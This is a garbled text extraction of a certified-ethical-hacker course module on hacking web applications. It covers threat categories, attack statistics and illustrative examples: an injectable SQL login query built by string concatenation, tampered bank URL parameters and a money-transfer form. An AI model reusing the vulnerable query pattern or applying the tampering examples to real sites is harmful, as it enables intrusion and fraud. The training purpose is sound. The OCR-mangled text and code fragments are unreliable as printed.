Professional Documents
Culture Documents
CEHv8 Module 13 Hacking Web Applications PDF
CEHv8 Module 13 Hacking Web Applications PDF
M o d u le 1 3
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications
H a c k in g W e b A p p lic a tio n s
M o d u le 13
E n g in e e re d b y H ackers. P r e s e n te d b y P ro fe s s io n a ls .
CEH
a
E t h ic a l H a c k i n g a n d C o u n t e r m e a s u r e s v 8
M o d u le 1 3 : H a c k in g W e b A p p lic a tio n s
E x a m 3 1 2 -5 0
S e c u r ity N e w s CEH
S e c u r i t y N e w s
X S S A t t a c k s L e a d P a c k A s M o s t F r e q u e n t A t t a c k T y p e
a n d S e p t e m b e r , a n d o f f e r s a n im p r e s s io n o f t h e c u r r e n t i n t e r n e t s e c u r it y c lim a t e as a w h o le .
,S u p e r f e c t a ' a n d t h e y c o n s i s t o f C r o s s - s i t e S c r i p t i n g ( X S S ) , D i r e c t o r y T r a v e r s a l s , S Q L I n j e c t i o n s ,
a n d C r o s s - s i t e R e q u e s t F o r g e r y (C S R F ).
O n e o f t h e m o s t s i g n i f i c a n t c h a n g e s in a t t a c k t r a f f i c s e e n b y F ir e H o s t b e t w e e n Q 2 a n d Q 3 2 0 1 2
w a s a c o n s id e ra b le r is e in t h e n u m b e r o f c r o s s - s it e a t t a c k s , in p a r t i c u l a r XSS a n d CSRF a t t a c k s
rose to re p re se n t 64% o f th e g ro u p in t h e t h i r d q u a r t e r (a 2 8 % in c re a s e d p e n e t r a t i o n ) . X S S is
now th e m ost com m on a tta c k ty p e in th e S u p e rfe c ta , w ith CSRF n o w in second. F ire H o s t's
s e r v e r s b l o c k e d m o r e t h a n o n e m i l l i o n XSS a t t a c k s d u r i n g t h i s p e r i o d a lo n e , a f i g u r e w h i c h r o s e
69% , fr o m 6 0 3 , 0 1 6 s e p a r a t e a t t a c k s in Q 2 t o 1 , 0 1 8 , 8 1 7 in Q 3 . CSRF a t t a c k s r e a c h e d s e c o n d
p la ce o n t h e S u p e rfe c ta a t 8 4 3 ,5 1 7 .
C r o s s - s i t e a t t a c k s a r e d e p e n d e n t u p o n t h e t r u s t d e v e l o p e d b e t w e e n s i t e a n d u s e r . XSS a t t a c k s
i n v o l v e a w e b a p p l i c a t i o n g a t h e r i n g m a l i c i o u s d a t a f r o m a u s e r v ia a t r u s t e d s i t e ( o f t e n c o m i n g
in t h e f o r m o f a h y p e r l i n k c o n t a i n i n g m a l i c i o u s c o n t e n t ) , w h e r e a s CSRF a t t a c k s e x p l o i t t h e t r u s t
t h a t a s i t e h a s f o r a p a r t i c u l a r u s e r i n s t e a d . T h e s e m a l i c i o u s s e c u r i t y e x p l o i t s c a n a ls o b e u s e d
t o s t e a l s e n s i t i v e i n f o r m a t i o n s u c h as u s e r n a m e s , p a s s w o r d s a n d c r e d i t c a r d d e t a i l s - w i t h o u t
t h e s ite o r u s e r's k n o w le d g e .
T h e S u p e r f e c t a a t t a c k t r a f f i c f o r Q 3 2 0 1 2 c a n b e b r o k e n d o w n as f o l l o w s :
As w it h Q 2 2 0 1 2 , th e m a jo r it y o f a tta c k s F ire H o s t b lo c k e d d u r in g th e t h ir d c a le n d a r q u a r t e r o f
2 0 1 2 o r i g i n a t e d in t h e U n i t e d S t a t e s ( l l m i l l i o n / 7 4 % ) . T h e r e h a s h o w e v e r , b e e n a g r e a t s h i f t in
t h e n u m b e r o f a t t a c k s o r i g i n a t i n g f r o m E u r o p e t h i s q u a r t e r , as 1 7 % o f all m a l i c i o u s a t t a c k t r a f f i c
s e e n b y F i r e H o s t c a m e f r o m t h i s r e g i o n . E u r o p e o v e r t o o k S o u t h e r n A s ia ( w h i c h w a s r e s p o n s i b l e
f o r 6 % ), t o b e c o m e t h e s e c o n d m o s t l i k e l y o r i g i n o f m a l i c i o u s t r a f f i c .
E c o m m e r c e b u s i n e s s e s n e e d t o b e a w a r e o f t h e ris k s t h a t t h i s p e r i o d m a y p r e s e n t i t t o its
s e c u r i t y , as T o d d G l e a s o n , D i r e c t o r o f T e c h n o l o g y a t F i r e H o s t e x p l a i n s , " Y o u ' d b e t t e r b e l i e v e
t h a t h a c k e r s w i l l t r y a n d t a k e a d v a n t a g e o f a n y s u r g e s in h o l i d a y s h o p p i n g . T h e y w i l l b e d e v i s i n g
a n u m b e r o f w a y s th e y can ta k e a d v a n ta g e o f a n y w e b a p p lic a tio n v u ln e r a b ilitie s a n d w ill use
an a s s o r tm e n t o f d iffe r e n t a tta c k ty p e s and te c h n iq u e s to do so . W h e n i t 's a m a t t e r o f
c o n f i d e n t i a l d a t a a t ris k , i n c lu d in g c u s t o m e r 's f in a n c ia l i n f o r m a t i o n - c r e d it c a rd a n d d e b it ca rd
s te p s t o s to p su ch a tta c k s ."
M o d u le O b je c tiv e s CEH
M o d u l e O b j e c t i v e s
T h e m a i n o b j e c t i v e o f t h i s m o d u l e is t o s h o w t h e v a r i o u s k i n d s o f v u l n e r a b i l i t i e s t h a t
can be d is c o v e re d in w e b a p p l i c a t i o n s . T h e a t t a c k s e x p l o i t i n g t h e s e v u l n e r a b i l i t i e s a r e a ls o
h ig h lig h te d . T h e m o d u le s ta rts w it h a d e ta ile d d e s c rip tio n o f th e w e b a p p lic a tio n s . V a rio u s w e b
a p p lic a tio n th re a ts a re m e n tio n e d . The h a c k in g m e th o d o lo g y re v e a ls th e v a rio u s s te p s
i n v o l v e d in a p l a n n e d a t t a c k . T h e v a r i o u s t o o l s t h a t a t t a c k e r s u s e a r e d i s c u s s e d t o e x p l a i n t h e
w a y t h e y e x p l o i t v u l n e r a b i l i t i e s in w e b a p p l i c a t i o n s . T h e c o u n t e r m e a s u r e s t h a t c a n b e t a k e n t o
t h w a r t a n y s u c h a t t a c k s a r e a ls o h i g h l i g h t e d . S e c u r i t y t o o l s t h a t h e l p n e t w o r k a d m i n i s t r a t o r t o
m o n i t o r a n d m a n a g e t h e w e b a p p l i c a t i o n a r e d e s c r i b e d . F in a l ly w e b a p p l i c a t i o n p e n t e s t i n g is
d iscu sse d.
T h is m o d u l e f a m i l i a r i z e s y o u w i t h :
H o w W e b A p p lic a tio n s W o r k - S e s s io n M a n a g e m e n t A t t a c k
W e b A tta c k V e c to rs S A t t a c k D a ta C o n n e c t i v i t y
W e b A p p H a c k in g M e t h o d o lo g y s A t t a c k W e b S e r v ic e s
£
H a c k in g W e b s e r v e r s S C o u n te rm e a s u re s
A
A tta c k A u th e n tic a tio n M e c h a n is m s W e b A p p lic a tio n F ire w a ll
A
A tta c k A u th o riz a tio n S chem es S W e b A p p l i c a t i o n P en T e s t i n g
^־־ M o d u l e F l o w
Q W e b A p p C o n ce p ts
Q W e b A p p T h re a ts
© H a c k in g M e t h o d o lo g y
Q W e b A p p l i c a t i o n H a c k i n g T o o ls
© C o u n te rm e a s u re s
0 S e c u rity T o o ls
© W e b A p p P en T e s t i n g
Let us b e g in w i t h t h e W e b A p p c o n c e p ts .
^ ^ W e b A p p P e n T e s tin g W e b A p p C o n c e p ts
S e c u rity T o o ls W e b A p p T h re a ts
C o u n te rm e a s u re s ^ H a c k in g M e t h o d o lo g y
W e b A p p lic a t io n H a c k in g T o o ls
T h is s e c tio n in t r o d u c e s y o u t o t h e w e b a p p l i c a t i o n a n d its c o m p o n e n t s , e x p la in s h o w t h e w e b
a p p l i c a t i o n w o r k s , a n d its a r c h i t e c t u r e . It p r o v i d e s i n s i g h t i n t o w e b 2 .0 a p p l i c a t i o n , v u l n e r a b i l i t y
s ta c k s , a n d w e b a t t a c k v e c to r s .
Cross-Site Scripting
Information Leakage
f f W e b A p p l i c a t i o n S e c u r i t y S t a t is t ic s
~ S ource: h tt p s : / / w w w . w h it e h a t s e c . c o m
A c c o r d i n g t o t h e W H I T E H A T s e c u r i t y w e b s i t e s t a t i s t i c s r e p o r t in 2 0 1 2 , i t is c l e a r t h a t t h e c r o s s -
s ite s c r ip tin g v u ln e r a b ilitie s a re f o u n d on m o r e w e b a p p lic a tio n s w h e n com pa re d to o th e r
v u ln e ra b ilitie s . F ro m th e g ra p h y o u c a n o b s e r v e t h a t in t h e y e a r 2 0 1 2 , c r o s s - s i t e s c r i p t i n g
v u l n e r a b i l i t i e s a r e t h e m o s t c o m m o n v u l n e r a b i l i t i e s f o u n d in 5 5 % o f t h e w e b a p p l i c a t i o n s . O n l y
1 0 % o f w e b a p p l i c a t i o n a t t a c k s a r e b a s e d o n i n s u f f i c i e n t s e s s i o n e x p i r a t i o n v u l n e r a b i l i t i e s . In
o rd e r to m in im iz e th e ris k s a s s o c i a t e d w ith c ro s s -s ite s c rip tin g v u ln e ra b ilitie s in t h e web
a p p lic a tio n s , y o u have t o a d o p t n e ce s sa ry c o u n te r m e a s u re s a g a in s t th e m .
W Cross-Site Scripting
O
In fo rm a tio n Leakage
Q
aH In su fficien t A u th o riza tio n
I—
£ ■ L Cross-Site Request Forgery
C
o
•H 16% Brute Force
a.
SQL Injection
10 20
W e b a p p lic a t io n s p r o v id e a n in t e r f a c e b e t w e e n
T h o u g h w e b a p p lic a t io n s e n fo r c e c e r ta in
e n d u s e rs a n d w e b s e rv e rs th r o u g h a s e t o f
s e c u r ity p o lic ie s , th e y a re v u ln e r a b le
w e b p a g e s t h a t a re g e n e ra te d a t t h e
t o v a r io u s a tta c k s s u c h as SQL
s e rv e r e n d o r c o n t a in s c r ip t c o d e t o
in je c tio n , c ro s s -s ite s c r ip tin g ,
b e e x e c u te d d y n a m ic a lly w it h in
s e s s io n h ija c k in g , e tc .
\
t h e c lie n t w e b b r o w s e r
* ,
W e b a p p l i c a t io n s a n d W e b 2 .0
N e w w e b te c h n o lo g ie s s u c h as
t e c h n o lo g ie s a r e i n v a r i a b l y u s e d t o
W e b 2 .0 p r o v id e m o r e a tta c k
s u p p o r t c r it ic a l b u s in e s s f u n c t i o n s
s u rfa c e f o r w e b a p p lic a t io n
s u c h a s C R M , S C M , e tc . a n d i m p r o v e
e x p lo ita tio n
b u s in e s s e f f ic ie n c y
W e b A p p lic a t io n C o m p o n e n ts C E H
Urtifwd itfcMjl NMhM
IS
^ W e b A p p lic a tio n C o m p o n e n ts
Login: M o s t o f th e w e b s ite s a llo w a u th e n tic users to access th e a p p lic a tio n by m eans o f lo gin. It
m eans th a t to access th e service o r c o n te n t o ffe re d by th e w e b a p p lic a tio n user needs to
s u b m it h is /h e r use rn a m e and passw ord. Exam ple g m a il.co m
Session Tracking Mechanism: Each w e b a p p lic a tio n has a session tra c k in g m e ch a n ism . The
session can be tra c k e d by using cookies, URL re w ritin g , o r Secure Sockets Layer (SSL)
in fo rm a tio n .
Data Access: U sually th e w e b pages w ill be c o n ta c tin g w ith each o th e r via a data access lib ra ry
in w h ic h all th e data b a se d e ta ils are s to re d .
H o w W e b A p p lic a t io n s W o r k C E H
ID Topic News
SE LE C T * fro m new s w h e re id = 6329
6329 Tech CNN
O u tp u t
H o w W e b A p p lic a tio n s W o rk
FIG U R E 1 3 .2 : W o r k in g o f W e b A p p lic a t io n
W e b A p p lic a t io n A r c h it e c t u r e C E H
y ^ l ln t e m e r N
( W eb
S e rv ic e s
Clients Business Layer
A p p lic a tio n S e rv e r
Legacy Application
Data Access
P re s e n ta tio n L a y e r
ה
Firew all
Proxy Server,
H TTP R e q u e s t P arse r Cache
S e rv le t R e so u rc e A u th e n tic a t io n
C o n ta in e r H a n d le r a n d Lo gin
legacy Application
Data Access
Web Server
Prssantation Layer
f Cache
Cloud Services
Database Server
Servlet Resource Authentication
Container Handler and Login
F IG U R E 1 3 .3 : W e b A p p lic a t io n A r c h it e c t u r e
W e b 2 . 0 A p p l i c a t i o n s C E H
C«rt1fW4 itfciul NMkM
J W e b 2 .0 re fe rs t o a n e w g e n e r a tio n o f W e b a p p lic a t io n s t h a t p r o v id e a n in f r a s t r u c t u r e f o r m o r e d y n a m ic
u s e r p a r t ic ip a tio n , s o c ia l in t e r a c t io n a n d c o lla b o r a tio n
W e b 2 .0 A p p lic a t io n s
© RSS-generated s y n d ic a tio n
© Blogs (W o rd p re s s )
V u l n e r a b i l i t y S t a c k C E H
B u s in e s s L o g ic F la w s
C u s t o m W e b A p p li c a t i o n s
B _ T e c h n ic a l V u ln e r a b i l it ie s
T h ir d P a r t y C o m p o n e n t s
E l E O p e n S o u r c e / C o m m e r c ia l
D a ta b a s e f ^ ־w r O r a c le / M y S Q L / M S SQ L
W e b S e rv e r A p a c h e / M i c r o s o f t IIS
Apache
W i n d o w s / L in u x
O p e r a t i n g S y s te m
/OSX
N e tw o rk R o u t e r / S w it c h
S e c u r it y IPS / ID S
V u ln e r a b ilit y S ta c k
W indows / Linux
/O S X
Router / Switch
FIG U R E 1 3 .4 : V u ln e r a b ilit y S ta c k
W e b A t t a c k V e c t o r s C E H
A n a t t a c k v e c t o r is a p a t h o r m e a n s b y w h ic h a n a t t a c k e r c a n g a in
w a c c e s s t o c o m p u t e r o r n e t w o r k r e s o u r c e s in o r d e r t o d e liv e r a n
a t t a c k p a y lo a d o r c a u s e a m a lic io u s o u t c o m e (
A t t a c k v e c t o r s i n c lu d e p a r a m e t e r m a n i p u la t i o n , X M L p o is o n in g ,
c lie n t v a li d a t i o n , s e r v e r m i s c o n f i g u r a t io n , w e b s e r v ic e r o u t in g
is s u e s , a n d c r o s s - s it e s c r ip t in g ־־־
S e c u r ity c o n t r o ls n e e d t o b e u p d a t e d c o n t in u o u s l y a s t h e a t t a c k
v e c t o r s k e e p c h a n g in g w it h r e s p e c t t o a t a r g e t o f a t t a c k
W e b A tta c k V e c to rs
0 X M L p o is o n in g : A tta c k e rs p ro v id e m a n ip u la te d XM L d o c u m e n ts th a t w h e n e xe cu te d can
d is tu rb th e logic o f p arsing m e th o d on th e server. W h e n huge XMLs are e xe cu te d a t th e
a p p lic a tio n layer, th e n th e y can be easily be c o m p ro m is e d by th e a tta c k e r to la u n ch his
o r h e r a tta c k and g a th e r in fo rm a tio n .
© C lie n t v a lid a tio n : M o s t c lie n t-s id e v a lid a tio n has to be s u p p o rte d by se rve r-side
a u th e n tic a tio n . The AJAX ro u tin e s can be easily m a n ip u la te d , w h ic h in tu rn m akes a w a y
fo r a tta c k e rs to h a n d le SQL in je c tio n , LDAP in je c tio n , etc. and n e g o tia te th e w e b
a p p lic a tio n 's key resources.
0 W eb service ro u tin g issues: The SOAP messages are p e rm itte d to access d iffe r e n t nodes
on th e In te rn e t by th e W S -R o u te rs. The e x p lo ite d in te rm e d ia te nodes can give access to
th e SOAP messages th a t are c o m m u n ic a te d b e tw e e n tw o e n d p o in ts .
^־־ M o d u le F lo w
m Security Tools W e b A p p T h re a ts
This se ctio n lists and expla in s th e v a rio u s w e b a p p lic a tio n th re a ts such as p a ra m e te r/fo rm
ta m p e rin g , in je c tio n a ttacks, cross-site s c rip tin g a ttacks, DoS attacks, session fix a tio n attacks,
im p ro p e r e rro r h a n d lin g , etc.
W e b A p p lic a t io n T h r e a t s 1־ C E H
UrtiM Itkml Mstkm
In f o r m a t io n B ro k e n A c c o u n t
Leakage M anagem ent
C o o k ie Im p ro p e r
P o is o n in g S to ra g e E rro r H a n d lin g
W e b A p p lic a tio n T h re a ts -1
W e b a p p lic a tio n th re a ts are n o t lim ite d to a tta c k s based on URL and p o rt8 0 . D espite
using p o rts , p ro to c o ls , and th e OSI layer, th e in te g rity o f m is s io n -c ritic a l a p p lic a tio n s m u s t be
p ro te c te d fro m possible fu tu r e a ttacks. V e n d o rs who w ant to p ro te c t th e ir p ro d u c ts '
a p p lic a tio n s m u s t be able to deal w ith all m e th o d s o f a tta ck.
C o o k ie P o is o n in g
D ir e c to r y T r a v e r s a l
U n v a lid a te d I n p u t
C r o s s - s it e S c r ip t in g (X S S )
" iT f An a tta c k e r bypasses th e c lie n ts ID s e c u rity m e chanism and gains access p riv ile g e s , and
th e n in je cts m a lic io u s scripts in to th e w e b pages o f a p a rtic u la r w e b s ite . These m a licio u s scripts
can even re w rite th e HTM L c o n te n t o f th e w e b s ite .
I n je c t io n F la w s
S Q L In je c tio n
P a ra m e te r/F o rm T a m p e r in g
a This ty p e o f ta m p e rin g a tta c k is in te n d e d to m a n ip u la tin g th e p a ra m e te rs excha n g e d
b e tw e e n c lie n t and s e rv e r in o rd e r to m o d ify a p p lic a tio n data, such as user c re d e n tia ls
and p erm ission s, p rice and q u a n tity o f p ro d u c ts , etc. This in fo rm a tio n is a c tu a lly s to re d in
cookies, h id d e n fo rm fie ld s , o r URL Q u e ry Strings, and is used to increase a p p lic a tio n
fu n c tio n a lity and c o n tro l. M an in th e m id d le is one o f th e exam ples fo r th is ty p e o f a tta ck.
A tta c k e rs use to o ls like W e b scarab and Paros p ro x y fo r th e se attacks.
D e n ia l- o f- S e r v ic e (D o S )
M ||M ' '
t__ i__ A d e n ia l-o f-s e rv ic e a tta c k is an a tta c k in g m e th o d in te n d e d to te r m in a te th e
o p e ra tio n s o f a w e b s ite o r a se rve r and m ake it u n a va ila b le to in te n d e d users. For
instan ce, a w e b s ite re la te d to a bank o r em a il service is n o t able to fu n c tio n fo r a fe w h o u rs to a
fe w days. This results in loss o f tim e and m oney.
B ro k e n A c c e s s C o n tro l
B roken access c o n tro l is a m e th o d used by a tta cke rs w h e re a p a rtic u la r fla w has been
id e n tifie d re la te d to th e access c o n tro l, w h e re a u th e n tic a tio n is bypassed and th e
a tta c k e r c o m p ro m is e s th e n e tw o rk .
VA /// C r o s s - s ite R e q u e s t F o r g e r y
In fo r m a tio n L e a k a g e
Im p r o p e r E r r o r H a n d lin g
L o g T a m p e r in g
Logs are m a in ta in e d by w e b a p p lic a tio n s to tra c k usage p a tte rn s such as user login
c re d e n tia ls , a d m in login c re d e n tia ls , etc. A tta c k e rs usually in je c t, d e le te , o r ta m p e r
w ith w e b a p p lic a tio n logs so th a t th e y can p e rfo rm m a licio u s a ctio n s o r hide th e ir id e n titie s .
B u ffe r O v e r flo w
A w e b a p p lic a tio n 's b u ffe r o v e rflo w v u ln e ra b ility occurs w h e n it fa ils to guard its
b u ffe r p ro p e rly and a llo w s w r itin g b e yo n d its m a x im u m size.
B r o k e n S e s s io n M a n a g e m e n t
W h e n s e c u rity -s e n s itiv e c re d e n tia ls such as passw ords and o th e r useful m a te ria l are
n o t p ro p e rly ta k e n care, th e se typ e s o f atta cks occur. A tta c k e rs c o m p ro m is e th e
c re d e n tia ls th ro u g h th e se s e c u rity v u ln e ra b ilitie s .
S e c u r ity M is c o n f ig u r a t io n
B ro k e n A c c o u n t M a n a g e m e n t
In s e c u r e S to ra g e
W e b a p p lic a tio n s need to sto re se n sitive in fo rm a tio n such as passw ords, c re d it card
n u m b e rs , a c c o u n t reco rd s, o r o th e r a u th e n tic a tio n in fo rm a tio n s o m e w h e re ; possibly
in a databa se o r on a file system . If p ro p e r s e c u rity is n o t m a in ta in e d fo r th e se storage
lo c a tio n s , th e n th e w e b a p p lic a tio n m ay be a t risk as a tta c k e rs can access th e sto ra g e and
m isuse th e in fo rm a tio n s to re d . Insecure sto ra g e o f keys, c e rtific a te s , and passw ords a llo w th e
a tta c k e r to gain access to th e w e b a p p lic a tio n as a le g itim a te user.
W e b A p p lic a t io n T h r e a t s ■ 2 C E H
P la t fo r m
E x p lo its
In s e c u r e I n s u f f ic ie n t
׳V F a ilu re t o
D ir e c t O b je c t T ra n s p o rt L a ye r R e s tr ic t U R L
v 1־
R e fe r e n c e s P r o te c tio n Access
In s e c u r e
O b fu s c a tio n
C r y p to g r a p h ic
A p p lic a tio n
S to ra g e
S e c u r ity
DMZ
M anagem ent
P r o to c o l A tta c k s
E x p lo its
U n v a lid a te d
A u t h e n t ic a t io n W e b S e rv ic e s
R e d ir e c ts a n d
H ija c k in g A tta c k s
F o rw a rd s &
S e s s io n M a lic io u s
F ix a tio n A tt a c k F ile E x e c u tio n
P la tfo r m E x p lo its
V a rio u s w e b a p p lic a tio n s are b u ilt on by using d iffe r e n t p la tfo rm s such as BEA W e b logic and
C oldFusion. Each p la tfo rm has v a rio u s v u ln e ra b ilitie s and e x p lo its associated w ith it.
in In s e c u re D ir e c t O b je c t R e fe r e n c e s
§ W h e n v a rio u s in te rn a l im p le m e n ta tio n o b je c ts such as file , d ire c to ry , database
re c o rd , o r key are exposed th ro u g h a re fe re n c e by a d e v e lo p e r, th e n th e insecure d ire c t o b je c t
re fe re n c e takes place.
In s e c u re C r y p to g r a p h ic S to ra g e
A u th e n t ic a t io n H ija c k in g
N e tw o rk A c c e s s A tta c k s
fill 11=
N e tw o rk access atta cks can m a jo rly im p a c t w e b a p p lic a tio n s . These can have an e ffe c t
on basic level o f services w ith in an a p p lic a tio n and can a llo w access th a t sta n d a rd HTTP
a p p lic a tio n m e th o d s w o u ld n o t have access to .
C o o k ie S n o o p in g
W e b S e r v ic e s A t t a c k s
-^ I n s u f f ic ie n t T r a n s p o r t L a y e r P r o te c tio n
r ״ H id d e n M a n ip u la t io n
I
These ty p e s o f atta cks are m o s tly used by a tta c k e rs to c o m p ro m is e e -c o m m e rc e
w e b s ite s . A tta c k e rs m a n ip u la te th e h id d e n fie ld s and change th e data s to re d in th e m . Several
o n lin e stores face th is ty p e o f p ro b le m e ve ry day. A tta c k e rs can a lte r prices and c o n clu d e
tra n s a c tio n s w ith th e prices o f th e ir choice.
D M Z P ro to c o l A tta c k s
Q D e fa c e m e n t o f w e b s ite s
U n v a lid a te d R e d ir e c ts a n d F o r w a r d s
_____ A tta c k e rs m ake a v ic tim click an u n v a lid a te d lin k th a t appears to be a va lid site. Such
re d ire c ts m ay a tte m p t to in sta ll m a lw a re o r tr ic k v ic tim s in to d isclosing passw ords o r
o th e r se n sitive in fo rm a tio n . Unsafe fo rw a rd s m ay a llo w access c o n tro l bypass le a d in g to :
© S e cu rity m a n a g e m e n t e x p lo its
F a ilu r e to R e s tr ic t U R L A c c e s s
O b fu s c a tio n A p p lic a t io n
S e c u r ity M a n a g e m e n t E x p lo it s
__ L * S e s s io n F i x a t i o n A t t a c k
______ In a session fix a tio n a tta c k, th e a tta c k e r tric k s o r a ttra c ts th e user to access a
le g itim a te w e b se rve r using an e x p lic it session ID value.
___ M a lic io u s file e x e c u tio n v u ln e ra b ilitie s had been fo u n d on m o s t a p p lic a tio n s . The
cause o f th is v u ln e ra b ility is because o f unchecke d in p u t in to th e w e b server. Due to
th is unch ecke d in p u t, th e file s o f a tta cke rs are easily e xe cu te d and processed on th e w e b
se rve r. In a d d itio n , th e a tta c k e r p e rfo rm s re m o te code e x e c u tio n , in sta lls th e ro o tk it re m o te ly ,
and in a t least som e cases, takes c o m p le te c o n tro l o v e r th e system s.
U n v a l i d a t e d I n p u t C E H
In p u t v a lid a tio n fla w s re fe rs to a w e b a p p lica tio n An a tta c k e r e xplo its in p u t v a lid a tio n fla w s to
v u ln e ra b ility w h e re in p u t fr o m a c lie n t is n o t p e rfo rm c ro s s -s ite s c rip tin g , b u ffe r o v e rflo w ,
v a lid a te d b e fo re being processed by w e b in je c tio n a tta cks, etc. th a t re s u lt in d ata
a p p lica tio n s and backend servers t h e f t and s y s te m m a lfu n c tio n in g
Boy.com
D a ta b a s e
• B ro w s e r in p u t n o t
• v a lid a te d by th e w e b
: a p p lic a tio n
s t r i n g s q l — ,,s e l e c t * from U s e r s
h t t p : / / ju g g y b o y . c o m /lo g in . a sp x w here
? u s e r = ja s o n s 0 p a s s = s p r x n g fie ld u s e r = " י+ U s e r . T e x t + י יי
a n d p w d= ״ י+ P a s s w o r d .T e x t + « ! ״r
B ro w s e r Post R eq u e st M o d ifie d Q u e ry
U n v a lid a te d In p u t
D a ta b a s e
: B ro w s e r in p u t n o t
: v a lid a te d by th e w e b
: app lic a tio n
s t r i n g s q l — ,,s e l e c t * fro m U s e r s
h t t p : / / ju g g y b o y . c o m / l o g i n . a s p x Wtmmrnmr* w h e re
? u s e r = ja s o n s @ p a s s = s p r in g f ie ld u s e r = ' ” + U s e r .T e x t + ' ״
a n d p w d =1 ״+ P a s s w o r d .T e x t + " ' "r
B ro w s e r P o st R e q u e s t M o d ifie d Q u e ry
F ig u r e 1 3 .5 : U n v a lid a t e d I n p u t
ו
P a r a m e t e r / F o r m T a m p e r in g C E H
Urtifwd tlfcxjl lUthM
0 (D ® 1
| htp:/www.juggybank.com/cust.asp?profile=21&
debit=2500 < ........J■• T a m p e rin g w it h t h e |
URL p a ra m e te rs 1
0@ ® 1
| htp:/www.juggybank.com/cust.asp?profile=82&
debt=lSO
O < ........ J•■1...... .........
O t h e r p a r a m e te r s c a n
| http://w ww.juggybank.com /stat.asp?pg=531&status=view < ......... b e c h a n g e d in c lu d in g
a t t r i b u t e p a r a m e te r s
0 © ®
| http://w w w .juggybank.com /stat.asp?pg-147& status ־delete < ••••
P a ra m e te r/F o rm T a m p e r in g
r- •ייי■ ח
P a ra m e te r ta m p e rin g is a sim p le fo rm o f a tta c k a im e d d ire c tly a t th e a p p lic a tio n 's
business logic. This a tta c k takes a d va nta ge o f th e fa c t th a t m a n y p ro g ra m m e rs re ly on h id d e n
o r fix e d fie ld s (such as a h id d e n tag in a fo rm o r a p a ra m e te r in an URL) as th e o n ly s e c u rity
m easu re fo r c e rta in o p e ra tio n s . To bypass th is s e c u rity m echanism , an a tta c k e r can change
th e se p a ra m e te rs .
C om bo boxes, check boxes, and ra d io b u tto n s are exam ples o f p re -se le cte d p a ra m e te rs used to
tra n s fe r in fo rm a tio n b e tw e e n d iffe r e n t pages, w h ile a llo w in g th e user to se le ct one o f several
p re d e fin e d values. In a p a ra m e te r ta m p e rin g a tta c k , an a tta c k e r m ay m a n ip u la te th e se values.
For e xa m p le , c o n s id e r a fo rm th a t inclu d e s th e co m b o box as fo llo w s :
<FORM METHOD=POST A C T IO N = "x fe rM o n e y . a s p > ״
S o u rc e A c c o u n t: <SELECT N A M E ="S rcA cc">
<OPTION VALUE=" 1 2 3 4 5 6 7 8 9 " > * * * * * * 7 8 9</OPTION>
<OPTION V A L U E = "8 6 8 6 8 6 8 6 8 "> ***** *8 6 8 < /O P T IO N X /S E L E C T >
<BR >Am ount: <INPUT NAME="Amount" SIZE =20>
< B R > D e s tin a tio n A c c o u n t: <INPUT N A M E ="D estA cc" SIZE =40>
<B R X IN P U T TYPE=SUBMIT> <INPUT TYPE=RESET>
</FORM>
B ypassing
P a ra m e te r/fo rm ta m p e rin g can lead to th e ft o f services, esca la tio n o f access, session hijacking,
and assum ing th e id e n tity o f o th e r users as w e ll as p a ra m e te rs a llo w in g access to d e v e lo p e r
and d e b u g g in g in fo rm a tio n .
[GO http://www.juggybank.com/cust.asp?profile=21&debit=2500
T a m p e r in g w i t h t h e U R L
p a ra m e te rs
http://www.juggybank.com/cust.asp?profile=82&
debit=1500 ר
O th e r p a ra m e te rs c a n b e
D i r e c t o r y T r a v e r s a l C E H
C«rt1fW4 itkiul Nm Im
v D ir e c to r y T ra v e rs a l
Let us consider another example w here an attacker tries to access files located outside the web
publishing directory using directory traversal:
F IG U R E 1 3 .7 : D ir e c t o r y T r a v e r s a l
S e c u r it y M is c o n f ig u r a t io n C E H
Easy Exploitation
Using m isconfiguration vulnerabilities, attackers gain
u na u th o rize d accesses to d efa ult accounts, read
unused pages, e xplo it unpatched flaw s, and read o r
w rite unprotected files and directories, etc.
Common Prevalence
Security m isconfiguration can o ccur a t any level
o f an a p p lic a tio n stack, including th e p la tfo rm ,
w eb server, application server, fra m e w o rk, and
custom code
Example
e The application server admin console is automatically
installed and not removed
Default accounts are not changed
Attacker discovers the standard admin pages on server,
logs in w ith default passwords, and takes over
' ____ " D e velo pe rs and n e tw o rk a d m in is tra to rs sh ould check th a t th e e n tire stack is
c o n fig u re d p ro p e rly o r s e c u rity m is c o n fig u ra tio n can happe n a t any level o f an a p p lic a tio n
stack, in c lu d in g th e p la tfo rm , w e b server, a p p lic a tio n server, fra m e w o rk , and cu sto m code. For
instan ce, if th e se rve r is n o t c o n fig u re d p ro p e rly , th e n it re su lts in va rio u s p ro b le m s th a t can
in fe c t th e s e c u rity o f a w e b s ite . The p ro b le m s th a t lead to such instances in clu d e server
s o ftw a re fla w s , u n p a tc h e d s e c u rity fla w s, e n a b lin g unnecessary services, and im p ro p e r
a u th e n tic a tio n . A fe w o f th e se p ro b le m s can be d e te c te d easily w ith th e help o f a u to m a te d
scanners. A tta c k e rs can access d e fa u lt accounts, unused pages, u n p a tc h e d fla w s, u n p ro te c te d
file s and d ire c to rie s , etc. to gain u n a u th o riz e d access. A ll th e unnecessary and unsafe fe a tu re s
have to be ta k e n care o f and it proves v e ry b e n e ficia l if th e y are c o m p le te ly d isabled so th a t th e
o u ts id e rs d o n 't m ake use o f th e m fo r m a licio u s attacks. All th e a p p lic a tio n -b a s e d file s have to
be ta k e n care o f th ro u g h p ro p e r a u th e n tic a tio n and s tro n g s e c u rity m e th o d s o r crucial
in fo rm a tio n can be leaked to th e a tta cke rs.
I n j e c t i o n F l a w s C E H
In jectio n flaw s are w eb a pplication vulnerabilities th a t a llo w u n tru s te d data to be interpreted and executed
as part o f a com m and o r query
Attackers e xplo it injection fla w s by c o n s tru c tin g m alicious co m m an d s o r queries th a t result in data loss o r
co rrup tio n , lack o f accountability, o r denial o f access
Injection fla w s are p re va le n t in legacy code, o fte n fo u n d in SQL, LDAP, and XPath queries, etc. and can be
easily discovered by a pplication vu ln e ra bility scanners and fuzzers
SQL
S erver
J J
—
C o p y r ig h t © b y E&C01nal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
In je c tio n F la w s
S Q L in je c tio n
* C o m m a n d in je c tio n
L A D P in je c tio n
S Q L I n j e c t i o n A t t a c k s C E H
J SQL in je c tio n atta cks use a s e rie s o f m a lic io u s SQL q u e rie s to d ire c tly
m a n ip u la te th e d ata ba se
SQL injection
